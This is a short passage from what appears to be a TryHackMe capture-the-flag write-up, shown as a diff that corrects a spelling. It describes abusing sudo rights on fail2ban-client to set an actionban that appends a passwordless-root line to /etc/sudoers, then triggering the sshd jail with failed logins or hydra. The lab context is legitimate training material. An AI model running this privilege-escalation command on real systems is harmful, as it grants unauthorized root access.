K21-crypt/K21-crypt.github.io/content/writeups/tryhackme/Billing/index.md

 `sudo /usr/bin/fail2ban-client set sshd action myaction actionban "echo 'asterisk ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers"`

 So here, `echo 'asterisk ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers` will triggered when sshd jail is triggered.
-So we set the sshd action to our action and which will do a specific action to stop or reduce attack but here we used it to escalate our privelege to root.
+So we set the sshd action to our action and which will do a specific action to stop or reduce attack but here we used it to escalate our privilege to root.
 ![](Pasted%20image%2020250308055753.png)

 And now we need to trigger that jail, So we can try to do failed ssh or use hydra for it.